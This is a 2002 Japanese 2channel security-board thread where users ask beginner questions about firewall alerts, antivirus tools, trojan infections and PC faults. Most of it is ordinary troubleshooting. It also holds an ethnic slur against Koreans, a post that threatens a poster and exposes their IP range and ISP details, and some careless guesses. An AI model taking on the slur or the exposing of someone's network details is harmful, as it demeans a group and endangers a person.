761757:02/03/24 17:50
>>760
電力環境板だったと思ふ。再現はしない。よろすく。
762名無しさん@お腹いっぱい。:02/03/24 17:55
駆除とか隔離したウィルスはどっかに消えちゃうんでしょうか?
763cheshire-cat:02/03/24 18:04
>>762
君の心の中に。。。(嘘

駆除したら(成功なら)、消失。
隔離したら、隔離フォルダに移動。移動先では拡張子を変えたり暗号化して再感染しないように保管。
764名無しさん@お腹いっぱい。 :02/03/24 19:19
TR/PSW.Antigen.C
このウイルス(トロイ?)の詳細を教えて下さい。
765名無しさん@お腹いっぱい。:02/03/24 19:24
あの〜、元ハッカーで現在サーバー管理者やシステム管理者なんて
人は結構いるのでしょうか? それともソフト畑へ行くのでしょうか?
766 :02/03/24 19:30
>764
ウイルス博士がいると思ってんのか?
ワクチンソフトメーカーのHPで調べろ
767名無しさん@お腹いっぱい。:02/03/24 23:19
2ちゃんに書き込みするようになってから、頻繁にネットセキュリティー
が警告出すんですけど。。。。
何故でしょうか?

210.165.233.191←しつこい
768名無しさん@お腹いっぱい。:02/03/24 23:28
社内ネットワーク内で飛び交っているメールを
盗み見・・いや監視するツールって無いですかねー
769名無しさん@お腹いっぱい。:02/03/24 23:32
770768:02/03/24 23:46
>>769

thanks!
ただ、ちょっと説明が足りなかったですね。
自分のじゃなくて、「不特定多数の方々のメールを」
という意味でござりやす。
771名無しさん@お腹いっぱい。:02/03/24 23:50
>>770
読めないことないだろーけど、それはまずいよ〜
捕まるよん、たしか
>767
http://pc.2ch.net/test/read.cgi/sec/1002776091/を参照
2ちゃんの串チェック。
773名無しさん@お腹いっぱい。:02/03/24 23:56
>>770
串が理解できないっす。
教えてもらえますか?
>>773
プロキシ、で検索。
巨人ファンの人にセキュりティの説明するの、嫌いです。
なぜなら、彼らは基本的にお人好しだからです。
ネット上に悪い奴がいるとは信じてくれないのです。
知り合いの巨人ファン2人がネットをしているのですが
まるで無防備なんです。
先日、ゾヌ入れてあげたのに重いからとアンインストールしていました。
なんで巨人ファンは用心しないで生きていけるのでしょうか?
776名無しさん@お腹いっぱい。:02/03/25 03:29
ある日、突然ノートンの表示が出て攻撃されてるみたいなのですが
また誰の仕業なのでしょうか???
無料のエロサイトばっかり行ってるからでしょうか???

777 :02/03/25 03:37
>>776
攻撃か?
何の警告を見て攻撃だと思ったんだ
ポートスキャンは攻撃では無いぞ
778名無しさん@お腹いっぱい。:02/03/25 03:51
警告、234 345・・・から攻撃されています
みたいな事が昨日5回も表示されました。
何でしょぼユーザーの僕がハッキングされるのかさっぱりわかりません。
なんか韓国の人らしいです。
779 :02/03/25 04:04
>>776
インバウンドのトロイ警告は単なるポートスキャンです
自宅の玄関をノックされただけなので怖がることはありません
怖いのはノートン先生が検知できないプログラムです

(怖くない例)
日付: 2002/02/19 時刻: 14:45:26
アドレス 24.48.245.** からの不正侵入の試みを
規則 Backdoor/SubSeven トロイの木馬のデフォルト遮断 によって検出しました。
以降のアクセスを 30 分間遮断しました。
780:02/03/25 04:30
そうそうこういうのです!
何だよかった・・・エロサイトの管理人が怒って攻撃してんの
かと思った。レスありがとうです。
>>780
セキュリティホール無かったら大丈夫。
きちんとウィルスチェックとか、Winodws Updateしてる?
782:02/03/25 09:28
ウイルスチェックもUPDATEもしてますよ。
何かあったら怖いので(w
783名無しさん@お腹いっぱい。:02/03/25 09:33
エロサイトを見てると、よく下のようなメッセージが出るんですが、
これって「はい」を押しても大丈夫なの?
MicrosoftかInternetExploereからの確認ならまだ良いんだけど、
表示されているサイト特有のものだったらやばいかなと思うんで。

セキュリティ警告
■■■年齢チェック■■■ これより先アダルトの情報が含まれており
ます。18歳未満の方は利用できませんので“いいえ”を押して退出して
ください。18歳以上の方は“はい”を押してください。”は2002/03/20
に署名されて次から配布されております。インストールして実行します
か?

Netcash International Inc.
784名無しさん@お腹いっぱい。:02/03/25 09:48
>>783 どうして年齢チェックするのにインストールして実行しなければ
いけないのか、疑問に思わないか?「はい」を押したら「何をされても
いいですよ」ということだね。普通は国際電話に接続を切り替えられた
りするよね(w
785783:02/03/25 10:05
ありがとう。
CATV環境でPCにはモデムはついてません。
一度「はい」を押してみたけど、なんとも無いよね?
でも、こういうのがでてくると「はい」を押さないと
進めないので、ブラウザ終了させてるけど。
786784:02/03/25 10:30
>なんとも無いよね?
それはなんとも言えませんね。トロイ仕込まれてるかもしれないし。
「はい」押した以上「あなたにおまかせ、好きにして〜」状態だからね。
CATVなら国際電話の危険性がないだけであとの危険は他の接続と同じ。
むしろ、ADSLやCATVだから国際電話やQ2はやられないってことだけで
安心してしまうことが多くなっているような風潮が怖い。
最近はブラクラ、ジョークその他+トロイとかっていう
複合的な仕掛けが多いだけに。
788 ◆.//////. :02/03/25 12:03
新しいパソコンを買ったんですけど、ネット環境を移行したいのですが、
ppp接続のパスワード等が「*****」となっているものを、
解析して実際のパスワードを表示する方法を教えてください。

そういったツールがあったと思い、アングラ系を探したのですが、
でてくるのは圧縮ファイルのクラックソフトばかりでした。
もし、上記のようなソフトをご存じでしたらソフト名だけでも教えてください

よろしくおながいします。

OS Windows2000 + SP2
789@@:02/03/25 12:06
最近マカフィーがお亡くなりになってしまったので
ソフトを買い換えようと思うのですが
バスターと先生どちらがおすすめですか?
ソフト購入初めてなんで使いやすい方がいいです
宜しくお願いします
>>788
Vector行け。
>>789
Norton
というか、フリーので良いよ。
792 ◆.//////. :02/03/25 12:08
>>790
ありませんでした…

探し方が悪いんですかね??
>>789
http://garuda.medinfo.m.ehime-u.ac.jp/2001/avg/
これね。

>>792
探してないだろ。Vectorで「パスワード」で検索したら一発で出てきたぞ。
794 ◆.//////. :02/03/25 12:16
>>793
いやいや、探しました。
「Windows2000」の「ppp接続のパスワード」
のはないんですよ。
795 ◆.//////. :02/03/25 12:17
Win9x系、もしくはWin2kだけどPPPの設定以外
っていうのはあるんですけどね…
796 ◆.//////. :02/03/25 12:32
う〜む。やっぱり無理っぽいですね。
すみません、あきらめてプロバイダに問い合わせします。

>>793
いろいろ予想で書いてくださってありがとうです。
797789:02/03/25 13:12
>>793
使ってみます
ありがとうございました


798名無しさん@お腹いっぱい。:02/03/25 13:37
さっきZone Alarmが反応していたので調べてみると、MITからの侵入でした。
MITといえば、共和党と関係が深いといわれ、CIAやNSAの仕事をいていると言われています。
私はそんな機関に興味をもたれているのでしょうか。

The firewall has blocked Internet access to your computer (TCP Port 111) from 218.50.3.26 (TCP Port 4111) [TCP Flags: S].

Time: 2002/03/25 13:19:48

Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

Massachusetts Institute of Technology (NET-MIT-TEMP)
1 Amherst Street
Cambridge, MA 02139-1986
US

Netname: MIT
Netblock: 18.0.0.0 - 18.255.255.255

Coordinator:
Schiller, Jeffrey (JIS-ARIN) [email protected]
+1-617-253-8400 (FAX) +1 617 258-8736

Domain System inverse mapping provided by:

STRAWB.MIT.EDU 18.72.0.151
W20NS.MIT.EDU 18.70.0.160
BITSY.MIT.EDU 18.72.0.3

Record last updated on 26-Sep-1998.
Database last updated on 24-Mar-2002 19:56:58 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.
218.50.0.0はチョンだろ。
わけもわからずwhoisすんな。
800名無しさん@お腹いっぱい。:02/03/25 13:49
プ
Whoisコピペする意味がどこにあるんだよ。この陰謀マニア。
>>798
長ったらしいの貼りつけるなよ。
X-Files症候群だな。それか「自分は選ばれた者でアール」症候群。
804名無しさん@お腹いっぱい。:02/03/25 17:56
っていうか、まじでMITやCIAならそこからやらんでしょうし、
送信元くらい偽装するでしょう。
単なるロボットっておちはないの?
>>805 お前>>798と同レベルな馬鹿。
>>798
そりゃ〜、218.xxx.xxx.xxxと、18.xxx.xxx.xxxは違うわなぁ…
アドレスクラスももちろん違うし、とにかくもの凄ぉ〜い大違いだわなぁ…

だからといって叩くつもりもないんだが。
808 :02/03/25 23:07
809質問です:02/03/26 00:15
PGPのPGPdiskだけ単体で使えたらなと思って似たようなの探したら、
scramdiskっていうのを見つけたんですけど、これWin2kじゃ使えないんですよね。
似たような機能のフリーソフトでWin2kで使えるものってないでしょうか。

できれば、インストール作業をしなくても使えるものがいいです。
USBメモリーキーに実行ファイルと暗号化したデータファイル(データドライブ)を
入れておいて、どのパソコンでもデータが見れるようにしたいんです。
810質問です:02/03/26 00:29
しまった、ここって“ネットワーク”セキュリティの板だったんですね。
板ちがいですいません。
他の板あたってみます。
(どの辺がいいんだろう...)
811名無しさん@お腹いっぱい。:02/03/26 00:36
くだらない質問で申し訳ないのですが。
今、何時ですか?
朝の8ジデス
813 :02/03/26 00:48
「セキュリティー」と「盛りたい」って似てますよね?
814初出場厨房:02/03/26 00:55
Exploit-CodeBase ってどんなウイルスですか?
駆除方法をご教示願います・・・。
   
815おばか@かばお:02/03/26 02:01
http://members.tripod.co.jp/skaurai/newpage6.htm
ここのサイトから「メアドから住所割り出しソフト」という夢のような
ソフトをダウンロード&実行したら(where122.exe) BKDR_SUB7.MUIE.F 
というvirusに感染してしまいました。TrendのHPで確認したらハッキングツール
とのことですがどうやってハッキングされるのでしょう。もろパンツ、いや意味履
き違えていたらすいません。
816 :02/03/26 02:07
>>815
なんか企んでるな!
817まるせりーに:02/03/26 05:56
はじめまして。
ウィルス関係とおもわれるトラブルが発生したため質問させていただきます。
長文になりますが目を通していただけませんでしょうか。

私の友人でWinMXばかり使っている奴がいるのですが、
ダウンロード先に指定しているHDにアクセスできなくなる、文字化けしてアクセス不可になる
などの症状がでており、彼曰く、「ウィルスにやられた」だそうです。

しかし、私はウィルスかどうか判断しかねています。
なぜかというと、彼のPCにはウィルス対策ソフトとしてNorton インターネットセキュリティ 2002が
インストール、フルスキャン(監視)されており、一度もウィルスが見つかっていない。
また、DLしたファイルを移動、または右クリックしたら(スキャンのため)感染、
HDが容量0に、あるいは文字化けしたといっており、ファイルまたはプログラムを実行したのではないため。

以上の理由から判断に困っています。当然、ウィルスにも様々な種類がいるのでしょうが、
原因がウィルスだとしたら、送る相手も感染してしまいますよね。ちなみに彼のOSはWIN98無印なのですが、
Win9X限定ウィルス?あるいは相手はWindows以外のOS?

以下に彼の環境をわかる範囲で記載いたします。
------------------------------------------
PC:古いコンパック(CPU K6 確か300MHzくらい)
RAM:394MB
OS:Windows98無印

HD:一台目(Cドライブ:コンパックについてた古いヤツ)
HD:二代目(Dドライブ:リムーバブルケースにいれて使用、IBMの最近のヤツ。ATA100。)

LAN:Corega PCI-TXS
フレッツADSL 1.5M (ADSLモデム直つなぎ)

Norton インターネットセキュリティ 2002
------------------------------------------
こんな感じです。HDのリムーバブルケースはHDをはずしてもPC側にDドライブが認識されております。
デバイスマネージャでリムーバブルにチェックはいれておりません。接続形態不明。
ちなみにHDは一回目のウィルスの後、新しいHDに交換しており、それでも同じようなトラブルがおこっております。
私はリムーバブルケースを少し怪しいと思っているのですが、以前ATA66がではじめたころ、
ATA33では動作に不具合がでるものがあったと記憶しております。

いろいろ調べているのですが、なかなかこれという手がかりにありつけない状況です。
助言いただけるととてもありがたいです。
長文になりましたが、どうかよろしくおねがいします。
>>817
で、何をしたいの?
>>818
俺もオモタ
820 :02/03/26 11:12
>>817
>また、DLしたファイルを移動、または右クリックしたら
>(スキャンのため)感染、 HDが容量0に、あるいは
>文字化けしたといっており、ファイルまたはプログラムを
>実行したのではないため。
日本語ダイジョウブデスカ?

それはウイルスじゃないでしょ。
とりあえずリムーバルケースを外して直接ATAケーブルに
繋げて試してみればいいのでは?
821まるせりーに:02/03/26 13:34
>>818-820
レスありがとうございます。
日本語へんですいません。
目的は原因を明確にするためだったのですが、
うまく説明になってませんね。

被害にあったと言っている本人は根拠もなく
「WinMX使うとウィルスはいる」と周囲に言ってまわっているのですが、
それを否定できるだけの説明ができない現状です。
また、リムーバブルケースをはずせとは、何度も言っているのですが、
PCを空けるのが相当いやなことらしく、必ず拒否されます。
やれることを全てやってから意見をうかがうべきなのですが、
私のPCじゃないので無理に空けるわけにもいきません。
そこは嫌がるくせに、ウィルス入ったといってすごいへこんでるんです。
同様の症状の方がいらっしゃったらアドバイスをいただけるかと思い、
質問しました。

再び質問させていただきます。
@ファイルをクリック(移動、右クリックメニュー表示のため)することで感染し、
症状としてファイルの存在するハードディスクを消去、なんらかのトラブルを発生させるウィルスは存在しますか?
A上記のようなハードディスクのトラブルが、リムーバブルケースによる接続、またはATA33にATA100のハードディスクを
接続するといったような状況で発生することがありますか?

再び長文、駄文になったことをお詫びしつつ、
どなたか助言いただけるとありがたいです。
どうかよろしくお願いします。
822 :02/03/26 13:47
NIS2001のメール保護についてですが
最近まで普通に使えていたのですが
突然送信ができなくなってしまいました。
エラーメッセージは出ませんが自分に出すと返って来ません。
プロバイダかと思いサポートに電話したところ
保護設定を解除してみろと言われ解除したら
ちゃんと使えるようになりました。
シマンテックに電話したらユーザー登録してないと
サポートでけんばいとか言って全くお話になりません。
似たような症状の人居ませんか?
823名無しさん@お腹いっぱい。:02/03/26 14:48
ADSL環境下で使えるフリーのFTPありませんか?
今使ってるのだとファイヤーウォールどーのこーので繋げないんですけど…
>>823
ttp://www2.biglobe.ne.jp/~sota/ffftp.html

お勧めFTPソフト
http://pc.2ch.net/test/read.cgi/software/998548988/l50
FFFTPを語るスレッド
http://pc.2ch.net/test/read.cgi/software/1016984571/l50

「こんなソフトありませんか?」スレッドVol.10
http://pc.2ch.net/test/read.cgi/win/1014960105/l50
■こんなソフトウェアはどこで?■
http://pc.2ch.net/test/read.cgi/software/1012625449/l50
825名無しさん@お腹いっぱい。:02/03/26 15:29
>>821
まさにスレタイトルにふさわしい質問ではある。

他人のパソのことなら、そいつにまかせりゃイイだろ。
解明したけりゃ、自分で調べろ。 しらねぇーYO!
826名無しさん@お腹いっぱい。:02/03/26 16:55
質問させて下さい。
ofsfi-##.odn.ad.jp < このリモートホストって東京のどのあたりのアクセスポイントかご存知ないですか?

BBSが攻撃されてるわけじゃないんですが、ただただリロードを繰り返されてて不気味なんです。
よろしくお願いします。
827名無しさん@お腹いっぱい。:02/03/26 17:02
>ただただリロードを繰り返されてて不気味なんです。
いいじゃねえか、変な書き込みされるよりも。
公開されてるBBSなんだろ。読んでもらってありがたいと思わなきゃ。
828名無しさん@お腹いっぱい。:02/03/26 17:23
>>827 それはそうなんですが、サーバーの負荷が大きくなると、目つけられて下手すっとCGI使えなくなっちゃうんです。
お願いですから教えて下さい。
829名無しさん@お腹いっぱい。:02/03/26 17:29

大量の女神IP晒されてます。

http://wow.bbspink.com/test/read.cgi/hneta/1017045573/
830名無しさん@お腹いっぱい。:02/03/26 18:02
>>823
パッシヴ(passive)モードでも?
831名無しさん@お腹いっぱい。:02/03/26 19:51
LANで繋がってるwinからmacを攻撃する方法ってないですか?
PCを落としたり、ハードディスクを初期化したり、重要なファイルを消したりしたいのです。

どなたか教えてください。
教えて君で済みません。
832名無しさん@お腹いっぱい。:02/03/26 19:56
すいません、2ちゃんのスレ立てやレス付けをしても
絶対に誰にも個人情報取られたりしないのですか?
833トロイかな?:02/03/26 20:05
IE立ち上げた時に、どこにも接続してないのに、なにか通信してるんだけど。
ZoneAlarmも反応しないし、ウイルスチェックにもひっかからない。
>828
ODNにそのログを提出して、警告なりアカウント削除なりを
してもらったほうがいいと思う。
後は、アクセス制限をするとか。

>831
初級ネット板へ逝け。

>832
IPアドレスは取られるけど、犯罪を起こさなければ問題なし。

>833
UDP:1024ポートあたり?
835 :02/03/26 21:45
>>821
Aだ。
なんでATA100のHDDにわざわざATA33のケーブル使ってんだ?
そのりリムーバルケースはATA100対応なのか?
最新定義のウイルスソフトで検知されないのなら
とりあえず別を疑うのが常識。
>>831
氏んでくれ。
837まるせりーに:02/03/26 22:15
>>835、他のみなさま
助言ありがとうございます。
まったくもっておっしゃるとおりです。

アドバイスしてくださったことについて、
確認してみようとおもいます。

アドバイスくださったみなさま、
本当にありがとうございました。
もっと勉強して、いつかはアドバイスする側の人間になれるよう
努力したいと思います。日本語についても。

今回は勉強させていただきました。
ありがとうございました。
838名無しさん@お腹いっぱい。:02/03/27 00:21
あれれ、久しぶりにMcAfeeスレ見に来たら dat落ちしてんじゃん。

新スレがいくら探しても見つからないんだけど どうなってしまったの?
まさか結論がでたとか(藁、 ソースネクストからスレ削除依頼来たとか。
839名無しさん@お腹いっぱい。:02/03/27 02:05
>>838
みんな面倒だからと
次スレ立てなかっただけ

誰かがPart3スレ立てれば復活するけど
スレ立ちませんでした。

♂MCAFEEのウィルススキャン どうよ♂
http://pc.2ch.net/test/read.cgi/software/1001838214/-100
841名無しさん@お腹いっぱい。:02/03/27 02:30
「こんにちは、ユカで〜す!」というメールが少し前から来るんだけど
みんなには来てます?本文が怪しいE-mailアドレスばかりの意味不明な
ヤツなんだけど…
ポート135って何?どうやって止める?
843ご教授の程を:02/03/27 03:05
 つい先頃から、マウスポインタが強制的に移動してしまう現象に
おちいって、ほとほと困っております。
 よろしければ、対処・情報等、教えていただければ幸いです。な
お、この板に書き込んだ理由は、ウィルスでは無いかと考えた次第
からです。
 お手数ですが、なにとぞよろしくお願いします。

『症状』
・マウスポインタの強制移動
 デスクトップ上、及び各種ソフト使用時でも発生。
 (※ウィンドウ、排他画面ソフト含む)
・強制移動位置
 図)ディスプレイ
      |
      |
      |
―――――――――――
      |●ココラヘン
      |
      |

『試した対処』
・ケーブルさし直し(電源OFF・電源ON双方)
・ドライバ削除・インストールし直し
・ノートンによるクリーン処理、ウィルススキャン
・全常駐OFF
・やばそうなデータならびにソフトの削除(無かったと思います)

 以上です。
 ただ、気になったのは
---------------------------------------
VBS.DWorld.AはVBスクリプトワームの一種で、
自分自身を添付した電子メールをユーザのアド
レス帳に登録されているメールアドレスすべて
に送りつけます。また、mIRCを介しても感染を
広げます。
毎月1日と27日になると、メッセージを表示し、
マウスとキーボードを使用不能にする発病症状
を持っています。
---------------------------------------
です。日付が日付なだけに・・・でも、検索されないし(汗


 なにとぞ、なにとぞ、ご教授の程を。
844ご教授の程を:02/03/27 03:11
すみません、書き忘れ・・・。

OS Windows2000p
対処補足 電源OFF(5分間)

以上です。
845名無しさん@お腹いっぱい。:02/03/27 08:29
http://www.nissan.co.jp/

死んでません?
>>843-844
USB(いろいろと相性とか競合多し)かPS2か、
ノートタイプ(タッチパッド等との併用可能か排他か)か、
などの情報がないんで、他の問題の可能性を除去できないよ。
それに、ケーブル差し直しはUSBでなかったらやばいし。
マウスならまだしも、キーボードだといっちまうこともあるよ。
あと、マウスのメーカーのサイトなどみて、OSとの対応や、
ドライバの更新の有無とかは確かめた?
847846:02/03/27 09:59
あ、ケーブルの差し直しでやばいのは電源ON時ね。
848846:02/03/27 10:04
あとさあ、このシマンテックのサイトなんかみると、
詳しい状況が載っているんだから、レジストリとか、
それらしきファイルの存在とか確認はできると思うんだけどなあ。

http://www.symantec.com/region/jp/sarcj/data/v/vbs.dworld.a.html

念のため聞くけど、ちゃんと更新してからスキャンしてるよね?
849名無しさん@お腹いっぱい。:02/03/27 11:11
おまえら、気がついたらIEのwindow titleが「小林カツ代エクスプローラ」に変えられてたんですが
そんなトロイってあるんですか?
850名無しさん@お腹いっぱい。:02/03/27 12:22
Windows板に質問させて頂いたのですが、こちらの板の方が住人のスキルが高いと
言われ、引っ越してきました。

2000サーバーが勝手にルーターを使ってダイヤルアップします。
サーバーの電源を切っているとルーターにダイヤルアップのログが無いので
明らかにサーバーの仕業だと思うのですが、原因は何でしょうか。
ちなみにサーバー機にインストールしたソフトはOSだけです。

今までに確認した事項(過去ログ、FAQより)
・DNS への動的登録を禁止
  「マイネットワーク」を右クリックし、[プロパティ] をクリック。
  「ローカルエリア接続」を右クリックし、[プロパティ] をクリック。
  [インターネットプロトコル(TCP/IP)] をダブルクリック。
  「詳細設定」ボタンをクリック。
  [DNS] タブをクリックし、「この接続のアドレスをDNSに登録する」のチェックを解除。
  「OK」をクリックして設定を保存。
・Active Directory の LDAP 参照や、コンピュータブラウザのドメイン名<1b>
 への接続要求を確認
  「マイコンピュータ」を右クリックし、[プロパティ] をクリック。
  [ネットワークID] タブをクリックし、「プロパティ」ボタンをクリック。
  「詳細」ボタンをクリックし、「このコンピュータのプライマリ DNS サフィック
  ス」に何も記入されていないことを確認。
  「マイネットワーク」を右クリックし、[プロパティ] をクリック。
  「ローカルエリア接続」を右クリックし、[プロパティ] をクリック。
  [インターネットプロトコル(TCP/IP)] をダブルクリック。
  「詳細設定」ボタンをクリック。
  [DNS] タブをクリックし、「この接続の DNS サフィックス」に何も記入されていな
  いことを確認。
・IEの自動更新の確認
  IEのツール → インターネットオプション → 詳細設定 → Internet Explorer の
  更新について自動的に確認する にチェックしてないかどうか。
・メディアプレイヤーの自動更新の確認。
  [スタート]−[ファイル名を指定して実行] から regedit を起動。
  HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \MediaPlayer を展開。
  [編集]−[新規]−[文字列] から EnableAutoUpgrade 値を作成。
  EnableAutoUpgrade 値をダブルクリックし、データに No を設定して「OK」をクリック。
・ウィルスの感染は無し


上記全て確認しましたが、ダメです。かってにダイヤルアップします。
何故でしょうか。
チェックすべき項目があれば、ぜひとも教えてください。
>>850
2000サーバよりルータの設定を見直した方がいいんじゃないか?
何かしらのパケットが飛んできてダイアルしているんだろうから
そのパケットでダイアルしないようにすればいいでしょ?
852850:02/03/27 13:16
>>851
レスありがとうございます。
今からルーターの設定とか調べてみます。
>>850
ルータのログにトリガーが残ってないのか?
854名無しさん@お腹いっぱい。:02/03/27 13:28
ノートン先生(更新した状態)でも感知できないウイルスがあるって
聞いたんですけどマブですか? 
>>845
ったりまえだろ。存在しないウィルスの定義データどうやって作るんだよ。
856850:02/03/27 13:58
>>853
レスありがとうございます。
ダイヤルアップのトリガーになっているパケットを無視する設定にすればいいんですよね。
今ちょっと確認できない状況なので、後でルーターを確認してみます。
今回 1 回だけユーザーが選択したのは 「遮断」 通信。 詳細:
インバウンド UDP パケット
ローカルアドレス、 サービスは xx.xxx.xx.xx,isakmp(500)
リモートアドレス、 サービスは 66.31.47.231,62114
プロセス名は C:\WINNT\system32\lsass.exe

Lsass.exeに接続要求来たんですけど、もしかしてトロイに感染してます?
(((( ;゚Д゚)))ガクガクブルブル
858ご教授の程を@844:02/03/27 17:31
>>846さん
 ありがとう御座います。
 説明不足があり申し訳ありません。
 マウスは二種類使用していまして、PS2+USBの双方を使用してい
ます。これらは以前、正常に動作していたもので、昨日突然、前述
した症状が発生しました。ドライバの更新の有無も確認しました。

 LiveUPdateで随時最新版に更新してからスキャンしています。
VBSDWorld.Aに関しては、同じようにマウスにちょっかいを出す新
型でも出たのかなぁと。

 依然として、直っていません。(汗
859 :02/03/27 18:03
>>858
PS2でもUSBでもこの症状が起きるってことでいいの?
それとこのPCはノートなの?
例えばノートに付いてるマウスが故障してるってことがあるからね。
860通報しますた。:02/03/27 19:18
通報しますた。
−−−−−
H大好きな女子と友達になりたい。名前:あゆかちゃん
[2002/03/27,13:15:02] No.8024
H大好きな女子と友達になりたい。
返事頂戴。
メールでお願いします。
−−−−−
設置場所の電話番号を押さえました。
懲罰を受けたくなかったら謝罪文を [email protected] に送り、
掲示板に謝罪文を書き込め。
[email protected]
218.225.143.

a.[IPネットワークアドレス]218.225.128.0-218.225.159.0
b.[ネットワーク名]XEPHION
f.[組織名]XePhion(株式会社エヌ・ティ・ティ エムイー)
g.[Organization]XePhion(NTT-ME Corporation)
[email protected]
861cheshire-cat:02/03/27 19:18
>>858
マウスポインタがあちこち動き回るって意味なんだろうか。
悪質なJOKEソフトにそんなのが幾つかあったな。
>857

http://www.google.co.jp/search?q=cache:vwh5N07nOgUC:www.jwntug.or.jp/tech/technote/sysad/tcpview_pro-j.html+lsass.exe+&hl=ja&lr=lang_ja
>mstask.exe である。(何のためかご存知の方はぜひ連絡を;)
>135/tcp は svchost.exe、139/tcp は System、500/udp は lsass.exe が利用している。
>だからなんだと思われるかもしれないが、もし同一のポートでまったく別のプロセスが走っていたら、
>それはトロイの木馬かもしれない。(同一の名前だが実はトロイの木馬という場合もある)

>TCP/IP の通信状態を確認するのには、よくパケットモニタが、
>ポートの状態を確認するにはポートスキャナが利用される。
>しかし、いずれもそのポートが何のプロセスで利用されているのかまでは教えてくれない。
>怪しいポートが自分のシステムでオープンしていたとして、その犯人をどうやって特定したらよいだろうか?

インバウンドって外部からの接続要求のことだから、大丈夫じゃないかなと。
まあ、一応ウイルスチェックを。
863ご教授の程を@844:02/03/27 21:55
>>859
どうもご丁寧に。
USB・PS2のマウス双方に同じ現象が出ます。PCは自作のデスクトップ
です。
>>861
あちこちではなく、ある一定の二箇所に自動的に戻ってしまいます。

マウス関連やハード的な問題じゃないようなので、今、ビデオボード
のドライバを書き換えてます。一定の場所・どういったソフトでも発
生って所がビデオボード関連ぽいので。
デュアルディスプレイ対応のビデオボードだから・・・かもしれません。
864cheshire-cat:02/03/27 22:03
>>863
初めて聞く症例ですね。
お力になれずスマンっす。
自作機ならではの問題なんでしょうね。
修復成功したら、ぜひとも報告して下さい。
865cheshire-cat:02/03/27 22:24
先日検出が難しいvilliの詰め合わせをワクチンベンダー各社に送信した。
そしたら変なメルが届いた。

>>システム管理者に連絡してください。
>>スキャンした文書中の感染したすべてのコンポーネントを修復または削除しました。
>>ウィルス情報:
>>コンポーネント 漏れが送ったファイル [Win32.Pilsen.4096 within villi-store/Win32.Pilsen.zip]
>>はウィルス W95.Companion.4096.D が入っていて削除されました。

以下それ系の文章がひたすら続く。
何だコリャ。誰が送ったファイルを自動的にチェックしてくれなんて頼んだんだ。
866cheshire-cat:02/03/27 23:29
せっかくインフルエンザ休業中なのに、人がいなくてさみしい。
去年のうちに4500円×2で打ったワクチンが効いたのか、今冬は風邪しらずだ。
868名無しさん@お腹いっぱい。:02/03/27 23:50
>>862
ノートン先生でチェックしてみたんですけど、ウィルス出てきませんでした。
とりあえず安心かな。
(・∀・)ライーヨー!
869名無しさん@お腹いっぱい。:02/03/28 03:03
2ちゃんでDLしたzipファイルに困ってます
「きゃ〜!!」という叫び声と共に
田中麗奈の顔がでてきます
どうすれば出ないようになるのかわかりません。
具体的な削除方法などアドバイスよろしくお願いしますm(__)m
870名無しさん@お腹いっぱい。:02/03/28 03:13
>>869
ウィルスチェック
2回も書くな。
871名無しさん@お腹いっぱい。:02/03/28 03:15
>>870
うるせえ!アホが!
872名無しさん@お腹いっぱい。:02/03/28 03:22
>>871
あなたがうるさいですよ。
873ご教授の程を@844:02/03/28 04:48
>>846さん、>>859さん、cheshire-catさん、どうもありがとう
御座いました。
ビデオボードのドライバを変えたら、治ってしまいました。
多分、マウスポインタの移動場所から考えて、表示されている画
面(1280*1024)の大きさと、定期的にボードが検知する画面サ
イズが異なっていたため、ボードが検知したとされる1152*864
(1024*768)の左下隅の場所に移動していたのではないかと思い
ます。
結果として完全に板違い、お騒がせしてすみませんでした。
でも、2chでこんなに親切に対応してくれたの初めてなので、なん
だか得した気分です。
本当にありがとうございました。
874名無しさん@お腹いっぱい。:02/03/28 05:50
クリックで救える命がある
http://www.dffmedia.com/
クリックして、寄付に参加してね。
875cheshire-cat:02/03/28 07:03
>>873
ビデオボードか、なるほど。参考になりました。
876昨日の846:02/03/28 08:23
>>873
ああ、表示の方だったのか。そゆこともあるものなんだ。
とりあえず、解決されて何より。
2ちゃんも、板次第、スレ次第、運次第な面があるからなあ。
877名無しさん@お腹いっぱい。:02/03/28 08:56
>>868
最新パターンのノートンでも検知しない時があるから、トレンドのサイトで
オンラインチェックとWでやっとくと良いよ。

今までに数回発見できたことがある。

878名無しさん@お腹いっぱい。:02/03/28 09:05
先週あたりからExchangeを狙い撃ちにした、Virus付
きメールを大量に送ってくるアタックが続いてない?
「なんか調子悪い」と色んなところから声がかかる。

イベントログ見ると、同じようなパターンで侵入試行の失敗が残っ
てて、その何日か後からExchangeが不安定になるんだけどね。
古〜いPostOffice使ってるところは何ともないが..

ただのRelay狙いとも違うようで、気色悪い。
879 :02/03/29 05:36
 
880名無しさん@お腹いっぱい。:02/03/30 05:07
881名無しさん@お腹いっぱい。:02/03/30 06:31
あの〜、ノートン入れてからメールの添付(画像なんか)が全部削除されて
しまうのはどうしたらいいのやら。。。。
882名無しさん@お腹いっぱい。:02/03/30 09:11
さっき、トロイの木馬?(高危険度)に攻撃を受けて
AOUTOBLOCKで遮断しているコンピュータのアドレスが出てきたのですが何かやることはあるのですか?ほっといてもいいのですか
883名無し:02/03/30 09:43
IPAに連絡しないと
884質問の答えが聞きたいなら漏れに聞くな! ◆02DstxeI :02/03/30 09:46
>882
ありがとうございます
885名無しさん@お腹いっぱい。:02/03/30 09:49
110番ポート隠す方法あったら教えてクレー!
よろしくたのます。ちなみにルータ無しで・・・
886名無しさん@お腹いっぱい。:02/03/30 10:10
Norton SystemWorksを2001から2002にアップしたら、
AntiVirusのNetscapeプラグインのサポートが、なくなっていました。
AntiVirus2002で、これを有効にする方法はありますか?
887名無しさん@お腹いっぱい。:02/03/30 13:13
パソコンを窓から投げ捨ててるモナーのAA知りませんか。
以前この板で見たような記憶があるのですが。
888名無しさん@お腹いっぱい。:02/03/30 13:38
Win2000でwindows updateしようとするとredirと言うファイルが
ダウンロードされようとするんだけど、これってダウンロードしちゃって良いの?
889名無しさん@お腹いっぱい。:02/03/30 13:49
>886
プラグインのサポートがなくなっても、
Auto-Protectが働いてれば問題ないじゃん。
2度手間な無駄な機能がなくなっただけだとおもわれ。
890おめが〜:02/03/30 16:34
891名無しさん@お腹いっぱい。:02/03/30 16:38
892名無しさん@お腹いっぱい。:02/03/30 17:08
フリーのfirewallってありませんか?
>>892
ある。
894名無しさん@お腹いっぱい。:02/03/31 18:53
